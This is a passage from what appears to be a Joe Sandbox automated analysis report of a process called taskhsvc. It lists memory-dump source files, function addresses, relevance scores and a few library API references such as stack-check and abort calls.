    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001F095F, Relevance: 1.5, APIs: 1, Instructions: 14
    APIs
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001F3B63, Relevance: 1.5, APIs: 1, Instructions: 12
    APIs
      • Part of subcall function 001E87F0: abort.MSVCRT ref: 001E8846
      • Part of subcall function 001E87F0: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001F3A5F), ref: 001E8859
    • __stack_chk_fail.LIBSSP-0 ref: 001F3C1F
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001F2161, Relevance: 1.5, APIs: 1, Instructions: 12
    APIs
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001F359E, Relevance: 1.5, APIs: 1, Instructions: 12
    APIs
      • Part of subcall function 001E8780: abort.MSVCRT ref: 001E87D6
      • Part of subcall function 001E8780: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001EA4BB), ref: 001E87E9
      • Part of subcall function 00211340: abort.MSVCRT ref: 0021139A
      • Part of subcall function 00211340: abort.MSVCRT ref: 00211425
      • Part of subcall function 00211340: __stack_chk_fail.LIBSSP-0 ref: 00211595
    • __stack_chk_fail.LIBSSP-0 ref: 001F36AB
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001C6202, Relevance: 1.5, APIs: 1, Instructions: 8
    APIs
    Memory Dump Source
    • Source File: 00000013.00000002.1855013399.001C1000.00000020.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001C6215, Relevance: 1.5, APIs: 1, Instructions: 8
    APIs
    Memory Dump Source
    • Source File: 00000013.00000002.1855013399.001C1000.00000020.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001D3221, Relevance: 1.5, APIs: 1, Instructions: 8
    APIs
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001F0D6B, Relevance: 1.5, APIs: 1, Instructions: 8
    APIs
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
